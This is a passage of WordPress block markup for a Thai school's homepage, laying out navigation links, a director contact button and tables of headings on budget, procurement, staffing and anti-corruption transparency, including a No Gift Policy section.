\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":757,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/1-1.png\" alt=\"\" class=\"wp-image-757\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":758,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-2.png\" alt=\"\" class=\"wp-image-758\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=716\" data-type=\"page\" data-id=\"716\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 